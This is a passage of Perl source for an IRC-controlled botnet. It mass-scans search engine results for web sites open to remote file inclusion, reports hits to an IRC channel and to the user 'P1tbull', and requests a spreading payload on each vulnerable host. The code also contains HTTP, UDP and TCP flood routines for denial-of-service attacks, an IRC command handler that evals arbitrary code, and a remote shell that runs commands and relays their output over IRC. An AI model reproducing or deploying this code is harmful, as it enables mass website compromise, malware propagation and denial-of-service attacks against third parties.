  639. }}}
  640. exit;
  641. }}
  642.  
  643. ######################################################################
  644. #################### AllTheWeb
  645. ######################################################################
  646. if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
  647. if (my $pid = fork) {
  648. waitpid($pid, 0);
  649. } else {
  650. if (fork) {
  651. exit;
  652. } else {
  653. my $bug=$1;
  654. my $dork=$2;
  655. my $contatore=0;
  656. my %hosts;
  657. # Starting The Search Engine
  658.     my @alltheweb=&allthewebt($dork);
  659.     my @allweb=&standard($dork);
  660. #
  661. push(my @tot, @alltheweb, @allweb);
  662. #
  663. my @puliti=&unici(@tot);
  664.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 12A4ll8T12he4W8eb9,1 Total:9,1 ".scalar(@tot)." 4,1Cleaned:9,1 ".scalar(@puliti)." 9,1for 4,1 $dork ");
  665. my $uni=scalar(@puliti);
  666. foreach my $sito (@puliti)
  667. {
  668. $contatore++;
  669. if ($contatore %100==0){
  670. }
  671. if ($contatore==$uni-1){
  672.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 12A4ll8T12he4W8eb9,1 finished for4,1 $dork");
  673. }
  674. ### Print CMD and TEST CMD###
  675. my $test="http://".$sito.$bug.$id."?";
  676. my $print="http://".$sito.$bug.$cmd."?";
  677. ### End of Print CMD and TEST CMD###
  678. my $req=HTTP::Request->new(GET=>$test);
  679. my $ua=LWP::UserAgent->new();
  680. $ua->timeout(5);
  681. my $response=$ua->request($req);
  682. if ($response->is_success) {
  683. my $re=$response->content;
  684. if($re =~ /Mic22/ && $re =~ /uid=/){
  685. my $hs=geths($print); $hosts{$hs}++;
  686. if($hosts{$hs}=="1"){
  687.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,9[1,9@1,9Vuln1,9] 1,9(1,9SafeMode:1,9OFF1,9) 1,9(1,9Site:12,9 $print 1,9) ");
  688.   sendraw($IRC_cur_socket, "PRIVMSG P1tbull : $print ");
  689.   my $test2="http://".$sito.$bug.$spread."?";
  690. my $reqz=HTTP::Request->new(GET=>$test2);
  691. my $ua=LWP::UserAgent->new();
  692. my $response=$ua->request($reqz);
  693. }}
  694. elsif($re =~ /Mic22/)
  695. {
  696. my $hs=geths($print); $hosts{$hs}++;
  697. if($hosts{$hs}=="1"){
  698.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,4[1,4@1,4Vuln1,4] 1,4(1,4SafeMode:1,4ON1,4) 1,4(1,4Site:12,4 $print 1,4) ");
  699. my $test2="http://".$sito.$bug.$spread."?";
  700. my $reqz=HTTP::Request->new(GET=>$test2);
  701. my $ua=LWP::UserAgent->new();
  702. my $response=$ua->request($reqz);
  703. }}
  704. }}}
  705. exit;
  706. }}
  707.  
  708. ######################################################################
  709. #################### AOL
  710. ######################################################################
  711. if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
  712. if (my $pid = fork) {
  713. waitpid($pid, 0);
  714. } else {
  715. if (fork) {
  716. exit;
  717. } else {
  718. my $bug=$1;
  719. my $dork=$2;
  720. my $contatore=0;
  721. my %hosts;
  722. # Starting The Search Engine
  723.     my @aollist=&aol($dork);
  724.     my @aollista=&aola($dork);
  725.     my @aollistb=&aolb($dork);
  726.     my @aollistc=&aolc($dork);
  727. push(my @aolbyp,@aollist, @aollista, @aollistb, @aollistc );
  728. #
  729. push(my @tot, @aolbyp);
  730. my @puliti=&unici(@tot);
  731.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 11A13O11L9,1 Total:9,1 ".scalar(@tot)." 4,1Cleaned:9,1 ".scalar(@puliti)." 9,1for 4,1 $dork ");
  732. my $uni=scalar(@puliti);
  733. foreach my $sito (@puliti)
  734. {
  735. $contatore++;
  736. if ($contatore %100==0){
  737. }
  738. if ($contatore==$uni-1){
  739.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 11A13O11L9,1 finished for4,1 $dork");
  740. }
  741. ### Print CMD and TEST CMD###
  742. my $test="http://".$sito.$bug.$id."?";
  743. my $print="http://".$sito.$bug.$cmd."?";
  744. ### End of Print CMD and TEST CMD###
  745. my $req=HTTP::Request->new(GET=>$test);
  746. my $ua=LWP::UserAgent->new();
  747. $ua->timeout(5);
  748. my $response=$ua->request($req);
  749. if ($response->is_success) {
  750. my $re=$response->content;
  751. if($re =~ /Mic22/ && $re =~ /uid=/){
  752. my $hs=geths($print); $hosts{$hs}++;
  753. if($hosts{$hs}=="1"){
  754.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,9[1,9@1,9Vuln1,9] 1,9(1,9SafeMode:1,9OFF1,9) 1,9(1,9Site:12,9 $print 1,9) ");
  755.   sendraw($IRC_cur_socket, "PRIVMSG P1tbull : $print ");
  756.   my $test2="http://".$sito.$bug.$spread."?";
  757. my $reqz=HTTP::Request->new(GET=>$test2);
  758. my $ua=LWP::UserAgent->new();
  759. my $response=$ua->request($reqz);
  760. }}
  761. elsif($re =~ /Mic22/)
  762. {
  763. my $hs=geths($print); $hosts{$hs}++;
  764. if($hosts{$hs}=="1"){
  765.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,4[1,4@1,4Vuln1,4] 1,4(1,4SafeMode:1,4ON1,4) 1,4(1,4Site:12,4 $print 1,4) ");
  766. my $test2="http://".$sito.$bug.$spread."?";
  767. my $reqz=HTTP::Request->new(GET=>$test2);
  768. my $ua=LWP::UserAgent->new();
  769. my $response=$ua->request($reqz);
  770. }}
  771. }}}
  772. exit;
  773. }}
  774.  
  775. ######################################################################
  776. #################### Yahoo
  777. ######################################################################
  778. if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
  779. if (my $pid = fork) {
  780. waitpid($pid, 0);
  781. } else {
  782. if (fork) {
  783. exit;
  784. } else {
  785. my $bug=$1;
  786. my $dork=$2;
  787. my $contatore=0;
  788. my %hosts;
  789. # Starting The Search Engine
  790.     my @ylist=&yahoo($dork);
  791.     my @yalist=&yahooa($dork);
  792.     my @yblist=&yahoob($dork);
  793.     my @yclist=&yahooc($dork);
  794.     my @ydlist=&yahood($dork);
  795.         push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist );    
  796. #
  797. push(my @tot, @yahoobypass);
  798. my @puliti=&unici(@tot);
  799.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 11Y13ahoo4!9,1 Total:9,1 ".scalar(@tot)." 4,1Cleaned:9,1 ".scalar(@puliti)." 9,1for 4,1 $dork ");
  800. my $uni=scalar(@puliti);
  801. foreach my $sito (@puliti)
  802. {
  803. $contatore++;
  804. if ($contatore %100==0){
  805. }
  806. if ($contatore==$uni-1){
  807.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 11Y13ahoo4!9,1 finished for4,1 $dork");
  808. }
  809. ### Print CMD and TEST CMD###
  810. my $test="http://".$sito.$bug.$id."?";
  811. my $print="http://".$sito.$bug.$cmd."?";
  812. ### End of Print CMD and TEST CMD###
  813. my $req=HTTP::Request->new(GET=>$test);
  814. my $ua=LWP::UserAgent->new();
  815. $ua->timeout(5);
  816. my $response=$ua->request($req);
  817. if ($response->is_success) {
  818. my $re=$response->content;
  819. if($re =~ /Mic22/ && $re =~ /uid=/){
  820. my $hs=geths($print); $hosts{$hs}++;
  821. if($hosts{$hs}=="1"){
  822.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,9[1,9@1,9Vuln1,9] 1,9(1,9SafeMode:1,9OFF1,9) 1,9(1,9Site:12,9 $print 1,9) ");
  823.   sendraw($IRC_cur_socket, "PRIVMSG P1tbull : $print ");
  824.   my $test2="http://".$sito.$bug.$spread."?";
  825. my $reqz=HTTP::Request->new(GET=>$test2);
  826. my $ua=LWP::UserAgent->new();
  827. my $response=$ua->request($reqz);
  828. }}
  829. elsif($re =~ /Mic22/)
  830. {
  831. my $hs=geths($print); $hosts{$hs}++;
  832. if($hosts{$hs}=="1"){
  833.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,4[1,4@1,4Vuln1,4] 1,4(1,4SafeMode:1,4ON1,4) 1,4(1,4Site:12,4 $print 1,4) ");
  834. my $test2="http://".$sito.$bug.$spread."?";
  835. my $reqz=HTTP::Request->new(GET=>$test2);
  836. my $ua=LWP::UserAgent->new();
  837. my $response=$ua->request($reqz);
  838. }}
  839. }}}
  840. exit;
  841. }}
  842.  
  843. ######################################################################
  844. #################### MSN
  845. ######################################################################
  846. if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
  847. if (my $pid = fork) {
  848. waitpid($pid, 0);
  849. } else {
  850. if (fork) {
  851. exit;
  852. } else {
  853. my $bug=$1;
  854. my $dork=$2;
  855. my $contatore=0;
  856. my %hosts;
  857. # Starting The Search Engine
  858.     my @mlist=&msn($dork);
  859. push(my @tot, @mlist);
  860. my @puliti=&unici(@tot);
  861.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 13M11S13N9,1 Total:9,1 ".scalar(@tot)." 4,1Cleaned:9,1 ".scalar(@puliti)." 9,1for 4,1 $dork ");
  862. my $uni=scalar(@puliti);
  863. foreach my $sito (@puliti)
  864. {
  865. $contatore++;
  866. if ($contatore %100==0){
  867. }
  868. if ($contatore==$uni-1){
  869.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 13M11S13N9,1 finished for4,1 $dork");
  870. }
  871. ### Print CMD and TEST CMD###
  872. my $test="http://".$sito.$bug.$id."?";
  873. my $print="http://".$sito.$bug.$cmd."?";
  874. ### End of Print CMD and TEST CMD###
  875. my $req=HTTP::Request->new(GET=>$test);
  876. my $ua=LWP::UserAgent->new();
  877. $ua->timeout(5);
  878. my $response=$ua->request($req);
  879. if ($response->is_success) {
  880. my $re=$response->content;
  881. if($re =~ /Mic22/ && $re =~ /uid=/){
  882. my $hs=geths($print); $hosts{$hs}++;
  883. if($hosts{$hs}=="1"){
  884.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,9[1,9@1,9Vuln1,9] 1,9(1,9SafeMode:1,9OFF1,9) 1,9(1,9Site:12,9 $print 1,9) ");
  885.   sendraw($IRC_cur_socket, "PRIVMSG P1tbull : $print ");
  886.   my $test2="http://".$sito.$bug.$spread."?";
  887. my $reqz=HTTP::Request->new(GET=>$test2);
  888. my $ua=LWP::UserAgent->new();
  889. my $response=$ua->request($reqz);
  890. }}
  891. elsif($re =~ /Mic22/)
  892. {
  893. my $hs=geths($print); $hosts{$hs}++;
  894. if($hosts{$hs}=="1"){
  895.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,4[1,4@1,4Vuln1,4] 1,4(1,4SafeMode:1,4ON1,4) 1,4(1,4Site:12,4 $print 1,4) ");
  896. my $test2="http://".$sito.$bug.$spread."?";
  897. my $reqz=HTTP::Request->new(GET=>$test2);
  898. my $ua=LWP::UserAgent->new();
  899. my $response=$ua->request($reqz);
  900. }}
  901. }}}
  902. exit;
  903. }}
  904.  
  905. ######################################################################
  906. #################### ASK
  907. ######################################################################
  908. if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
  909. if (my $pid = fork) {
  910. waitpid($pid, 0);
  911. } else {
  912. if (fork) {
  913. exit;
  914. } else {
  915. my $bug=$1;
  916. my $dork=$2;
  917. my $contatore=0;
  918. my %hosts;
  919. # Starting The Search Engine
  920.     my @asklist=&ask($dork);
  921. push(my @tot, @asklist);
  922. my @puliti=&unici(@tot);
  923.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 13A11S13K9,1 Total:9,1 ".scalar(@tot)." 4,1Cleaned:9,1 ".scalar(@puliti)." 9,1for 4,1 $dork ");
  924.   my $uni=scalar(@puliti);
  925. foreach my $sito (@puliti)
  926. {
  927. $contatore++;
  928. if ($contatore %100==0){
  929. }
  930. if ($contatore==$uni-1){
  931.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 13A11S13K9,1 finished for4,1 $dork");
  932. }
  933. ### Print CMD and TEST CMD###
  934. my $test="http://".$sito.$bug.$id."?";
  935. my $print="http://".$sito.$bug.$cmd."?";
  936. ### End of Print CMD and TEST CMD###
  937. my $req=HTTP::Request->new(GET=>$test);
  938. my $ua=LWP::UserAgent->new();
  939. $ua->timeout(5);
  940. my $response=$ua->request($req);
  941. if ($response->is_success) {
  942. my $re=$response->content;
  943. if($re =~ /Mic22/ && $re =~ /uid=/){
  944. my $hs=geths($print); $hosts{$hs}++;
  945. if($hosts{$hs}=="1"){
  946.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,9[1,9@1,9Vuln1,9] 1,9(1,9SafeMode:1,9OFF1,9) 1,9(1,9Site:12,9 $print 1,9) ");
  947.   sendraw($IRC_cur_socket, "PRIVMSG P1tbull : $print ");
  948.   my $test2="http://".$sito.$bug.$spread."?";
  949. my $reqz=HTTP::Request->new(GET=>$test2);
  950. my $ua=LWP::UserAgent->new();
  951. my $response=$ua->request($reqz);
  952. }}
  953. elsif($re =~ /Mic22/)
  954. {
  955. my $hs=geths($print); $hosts{$hs}++;
  956. if($hosts{$hs}=="1"){
  957.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,4[1,4@1,4Vuln1,4] 1,4(1,4SafeMode:1,4ON1,4) 1,4(1,4Site:12,4 $print 1,4) ");
  958. my $test2="http://".$sito.$bug.$spread."?";
  959. my $reqz=HTTP::Request->new(GET=>$test2);
  960. my $ua=LWP::UserAgent->new();
  961. my $response=$ua->request($reqz);
  962. }}
  963. }}}
  964. exit;
  965. }}
  966.  
  967. ######################################################################
  968. #################### FireBall
  969. ######################################################################
  970. if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
  971. if (my $pid = fork) {
  972. waitpid($pid, 0);
  973. } else {
  974. if (fork) {
  975. exit;
  976. } else {
  977. my $bug=$1;
  978. my $dork=$2;
  979. my $contatore=0;
  980. my %hosts;
  981. # Starting The Search Engine
  982.     my @fireball=fireball($dork);
  983. push(my @tot, @fireball);
  984. my @puliti=&unici(@tot);
  985.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 13F11ire13B11all9,1 Total:9,1 ".scalar(@tot)." 4,1Cleaned:9,1 ".scalar(@puliti)." 9,1for 4,1 $dork ");
  986. my $uni=scalar(@puliti);
  987. foreach my $sito (@puliti)
  988. {
  989. $contatore++;
  990. if ($contatore %100==0){
  991. }
  992. if ($contatore==$uni-1){
  993.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 13F11ire13B11all9,1 finished for4,1 $dork");
  994. }
  995. ### Print CMD and TEST CMD###
  996. my $test="http://".$sito.$bug.$id."?";
  997. my $print="http://".$sito.$bug.$cmd."?";
  998. ### End of Print CMD and TEST CMD###
  999. my $req=HTTP::Request->new(GET=>$test);
  1000. my $ua=LWP::UserAgent->new();
  1001. $ua->timeout(5);
  1002. my $response=$ua->request($req);
  1003. if ($response->is_success) {
  1004. my $re=$response->content;
  1005. if($re =~ /Mic22/ && $re =~ /uid=/){
  1006. my $hs=geths($print); $hosts{$hs}++;
  1007. if($hosts{$hs}=="1"){
  1008.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,9[1,9@1,9Vuln1,9] 1,9(1,9SafeMode:1,9OFF1,9) 1,9(1,9Site:12,9 $print 1,9) ");
  1009.   sendraw($IRC_cur_socket, "PRIVMSG P1tbull : $print ");
  1010.   my $test2="http://".$sito.$bug.$spread."?";
  1011. my $reqz=HTTP::Request->new(GET=>$test2);
  1012. my $ua=LWP::UserAgent->new();
  1013. my $response=$ua->request($reqz);
  1014. }}
  1015. elsif($re =~ /Mic22/)
  1016. {
  1017. my $hs=geths($print); $hosts{$hs}++;
  1018. if($hosts{$hs}=="1"){
  1019.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,4[1,4@1,4Vuln1,4] 1,4(1,4SafeMode:1,4ON1,4) 1,4(1,4Site:12,4 $print 1,4) ");
  1020. my $test2="http://".$sito.$bug.$spread."?";
  1021. my $reqz=HTTP::Request->new(GET=>$test2);
  1022. my $ua=LWP::UserAgent->new();
  1023. my $response=$ua->request($reqz);
  1024. }}
  1025. }}}
  1026. exit;
  1027. }}
  1028. ######################
  1029. #End of EXTREMESCANNER#
  1030. #                    #
  1031. ######################
  1032. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  1033. # % Hacke Pwned your BoX  %
  1034. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  1035. ######################
  1036. #     HTTPFlood      #
  1037. #                    #
  1038. ######################
  1039. if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
  1040. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1HTTP-DDOS9,1] Attacking 4,1 ".$1." 9,1 on port 80 for 4,1".$2." 4,1 seconds .");
  1041. my $itime = time;
  1042. my ($cur_time);
  1043. $cur_time = time - $itime;
  1044. while ($2>$cur_time){
  1045. $cur_time = time - $itime;
  1046. my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  1047. print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  1048. close($socket);
  1049. }
  1050. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1HTTP-DDOS9,1] Attacking done 4,1 ".$1.".");
  1051. }
  1052. ######################
  1053. #  End of HTTPFlood  #
  1054. #                    #
  1055. ######################
  1056. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  1057. # % Hacke Pwned your BoX  %
  1058. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  1059. ######################
  1060. #     UDPFlood       #
  1061. #                    #
  1062. ######################
  1063. if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  1064. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1UDP-DDOS9,1] Attacking 4,1 ".$1." 9,1 with 4,1 ".$2." 9,1 Kb Packets for 4,1 ".$3." 4,1 seconds.");
  1065. my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  1066. $dtime = 1 if $dtime == 0;
  1067. my %bytes;
  1068. $bytes{igmp} = $2 * $pacotes{igmp};
  1069. $bytes{icmp} = $2 * $pacotes{icmp};
  1070. $bytes{o} = $2 * $pacotes{o};
  1071. $bytes{udp} = $2 * $pacotes{udp};
  1072. $bytes{tcp} = $2 * $pacotes{tcp};
  1073. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1UDP-DDOS9,1] 9,1Results4,1 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 9,1Kb in4,1 ".$dtime." 9,1seconds to4,1 ".$1.".");
  1074. }
  1075. exit;
  1076. }
  1077. }
  1078. ######################
  1079. #  End of Udpflood   #
  1080. #                    #
  1081. ######################
  1082.  
  1083.  
  1084. sub ircase {
  1085. my ($kem, $printl, $case) = @_;
  1086.   if ($case =~ /^join (.*)/) {
  1087.      j("$1");
  1088.    }
  1089.    if ($case =~ /^part (.*)/) {
  1090.       p("$1");
  1091.    }
  1092. if ($case =~ /^rejoin\s+(.*)/) {
  1093. my $chan = $1;
  1094. if ($chan =~ /^(\d+) (.*)/) {
  1095. for (my $ca = 1; $ca <= $1; $ca++ ) {
  1096. p("$2");
  1097. j("$2");
  1098. }
  1099. }
  1100. else {
  1101. p("$chan");
  1102. j("$chan");
  1103. }
  1104. }
  1105.  
  1106. if ($case =~ /^op/) {
  1107. op("$printl", "$kem") if $case eq "op";
  1108. my $oarg = substr($case, 3);
  1109. op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  1110. }
  1111.  
  1112. if ($case =~ /^deop/) {
  1113. deop("$printl", "$kem") if $case eq "deop";
  1114. my $oarg = substr($case, 5);
  1115. deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  1116. }
  1117.  
  1118. if ($case =~ /^msg\s+(\S+) (.*)/) {
  1119. msg("$1", "$2");
  1120. }
  1121.  
  1122. if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  1123. for (my $cf = 1; $cf <= $1; $cf++) {
  1124. msg("$2", "$3");
  1125. }
  1126. }
  1127.  
  1128. if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  1129. ctcp("$1", "$2");
  1130. }
  1131.  
  1132. if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  1133. for (my $cf = 1; $cf <= $1; $cf++) {
  1134. ctcp("$2", "$3");
  1135. }
  1136. }
  1137.  
  1138. if ($case =~ /^nick (.*)/) {
  1139. nick("$1");
  1140. }
  1141.  
  1142. if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  1143. conectar("$2", "$1", 6667);
  1144. }
  1145.  
  1146. if ($case =~ /^raw (.*)/) {
  1147. sendraw("$1");
  1148. }
  1149.  
  1150. if ($case =~ /^eval (.*)/) {
  1151. eval "$1";
  1152. }
  1153. }
  1154.  
  1155.  
  1156. sub shell {
  1157. my $printl=$_[0];
  1158. my $comando=$_[1];
  1159. if ($comando =~ /cd (.*)/) {
  1160. chdir("$1") || msg("$printl", "No such file or directory");
  1161. return;
  1162. }
  1163.  
  1164. elsif ($pid = fork) {
  1165. waitpid($pid, 0);
  1166. }
  1167. else {
  1168. if (fork) {
  1169. exit;
  1170.  
  1171. } else {
  1172. my @resp=`$comando 2>&1 3>&1`;
  1173. my $c=0;
  1174. foreach my $linha (@resp) {
  1175.   $c++;
  1176.   chop $linha;
  1177.   sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  1178.   if ($c == "$linas_max") {
  1179.     $c=0;
  1180.     sleep $sleep;
  1181.   }
  1182. }
  1183. exit;
  1184. }
  1185. }
  1186. }
  1187.  
  1188. sub tcpflooder {
  1189. my $itime = time;
  1190. my ($cur_time);
  1191. my ($ia,$pa,$proto,$j,$l,$t);
  1192. $ia=inet_aton($_[0]);
  1193. $pa=sockaddr_in($_[1],$ia);
  1194. $ftime=$_[2];
  1195. $proto=getprotobyname('tcp');
  1196. $j=0;$l=0;
  1197. $cur_time = time - $itime;
  1198. while ($l<1000){
  1199. $cur_time = time - $itime;
  1200. last if $cur_time >= $ftime;
  1201. $t="SOCK$l";
  1202. socket($t,PF_INET,SOCK_STREAM,$proto);
  1203. connect($t,$pa)||$j--;
  1204. $j++;$l++;
  1205. }
  1206. $l=0;
  1207. while ($l<1000){
  1208. $cur_time = time - $itime;
  1209. last if $cur_time >= $ftime;
  1210. $t="SOCK$l";
  1211. shutdown($t,2);
  1212. $l++;
  1213. }
  1214. }
  1215.  
  1216. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  1217. # % Hacke Pwned your BoX  %
  1218. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  1219.  
  1220. sub udpflooder {
  1221. my $iaddr = inet_aton($_[0]);
  1222. my $msg = 'A' x $_[1];
  1223. my $ftime = $_[2];
  1224. my $cp = 0;
  1225. my (%pacotes);
  1226. $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  1227. socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  1228. socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  1229. socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  1230. socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  1231. return(undef) if $cp == 4;
  1232. my $itime = time;
  1233. my ($cur_time);
  1234. while ( 1 ) {
  1235. for (my $porta = 1;
  1236. $porta <= 65000; $porta++) {
  1237. $cur_time = time - $itime;
  1238. last if $cur_time >= $ftime;
  1239. send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
  1240. send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  1241. send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  1242. send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  1243.  
  1244.  
  1245. for (my $pc = 3;
  1246. $pc <= 255;$pc++) {
  1247. next if $pc == 6;
  1248. $cur_time = time - $itime;
  1249. last if $cur_time >= $ftime;
  1250. socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  1251. send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  1252. }
  1253. }
  1254. last if $cur_time >= $ftime;
  1255. }
  1256. return($cur_time, %pacotes);
  1257. }
  1258.  
  1259. sub ctcp {
  1260. return unless $#_ == 1;
  1261. sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  1262. }
  1263.  
  1264. sub msg {
  1265. return unless $#_ == 1;
  1266. sendraw("PRIVMSG $_[0] :$_[1]");
  1267. }
  1268.  
  1269. sub notice {
  1270. return unless $#_ == 1;
  1271. sendraw("NOTICE $_[0] :$_[1]");
  1272. }
  1273.  
  1274. sub op {
  1275. return unless $#_ == 1;
  1276. sendraw("MODE $_[0] +o $_[1]");
  1277. }
  1278.  
  1279. sub deop {
  1280. return unless $#_ == 1;
  1281. sendraw("MODE $_[0] -o $_[1]");
  1282. }
  1283.  
  1284. sub j {
  1285. &join(@_);
  1286. }
  1287.  
  1288. sub join {
  1289. return unless $#_ == 0;
  1290. sendraw("JOIN $_[0]");
  1291.  
  1292. }
  1293. sub p { part(@_);
  1294. }
  1295.  
  1296. sub part {
  1297. sendraw("PART $_[0]");
  1298. }
  1299.  
  1300. sub nick {
  1301. return unless $#_ == 0;
  1302. sendraw("NICK $_[0]");
  1303. }
  1304.  
  1305. sub quit {
  1306. sendraw("QUIT :$_[0]");
  1307. }
  1308.  
  1309. #####
  1310. # SUBS GOOGLE
  1311. #####
  1312. sub googlet {
  1313. my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk");
  1314. my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK");
  1315. my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el");
  1316. my @lst;
  1317. my $key=key($_[0]);
  1318. my $c=0;
  1319. foreach my $i (@dominios){
  1320. my @lista = google($i,$key,$lang[$c],$country[$c]);
  1321. push(@lst,@lista);
  1322. $c++;
  1323. }
  1324. return @lst;
  1325. }
  1326.  
  1327. sub google(){
  1328. my @lst;
  1329. my $i=$_[0];
  1330. my $key=$_[1];
  1331. my $lang= $_[2];
  1332. my $country =$_[3];
  1333. for($b=0;$b<=5000;$b+=100){
  1334. my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country);
  1335. my $Res=query($Go);
  1336. while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  1337. if ($1 !~ /google/){
  1338. my $k=$1;
  1339. my @grep=links($k);
  1340. push(@lst,@grep);
  1341. }}}
  1342. return @lst;
  1343. }
  1344.  
  1345. #####
  1346. # SUBS AllTheWeb
  1347. #####
  1348.  
  1349. sub allthewebt {
  1350. my @lang = ("en","es","de","nl","pt-BR","it","de","fo");
  1351. my @lst;
  1352. my $key=key($_[0]);
  1353. my $c=0;
  1354. foreach my $lang (@lang){
  1355. my @lista = alltheweb($key,$lang[$c]);
  1356. push(@lst,@lista);
  1357. $c++;
  1358. }
  1359. return @lst;
  1360. }
  1361.  
  1362.  
  1363. sub alltheweb(){
  1364. my @lista;
  1365. my $key = $_[0];
  1366. my $lang= $_[1];
  1367. for($b=0;$b<=500;$b+=100){
  1368. my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b);
  1369. my $Res=query($alltheweb);
  1370. while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
  1371. my $k=$1;
  1372. $k=~s/ //g;
  1373. my @grep=links($k);
  1374. push(@lst,@grep);
  1375. }}
  1376. return @lst;
  1377. }
  1378.  
  1379. sub standard()
  1380. {
  1381. my @lst;
  1382. my $key=$_[0];
  1383. my $i=0;
  1384. my $pg=0;
  1385. for($i=0; $i<=1000; $i+=100)
  1386. {
  1387. my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
  1388. my $Res=query($all);
  1389. while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
  1390. my $k=$1;
  1391. $k=~s/ //g;
  1392. my @grep=links($k);
  1393. push(@lst,@grep);
  1394. }}
  1395. return @lst;
  1396. }
  1397.  
  1398. #####
  1399. # SUBS AOL
  1400. #####
  1401. sub aol(){
  1402. my @lst;
  1403. my $key = $_[0];
  1404. for($b=1;$b<=100;$b++){
  1405. my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
  1406. my $Res=query($AoL);
  1407. while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
  1408. my $k=$1;
  1409. my @grep=links($k);
  1410. push(@lst,@grep);
  1411. }}
  1412. return @lst;
  1413. }
  1414.  
  1415. sub aola(){
  1416. my @lst;
  1417. my $key = $_[0];
  1418. for($b=1;$b<=59;$b+=1){
  1419. my $AoL=("http://64.12.129.44/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_en");
  1420. my $Res=query($AoL);
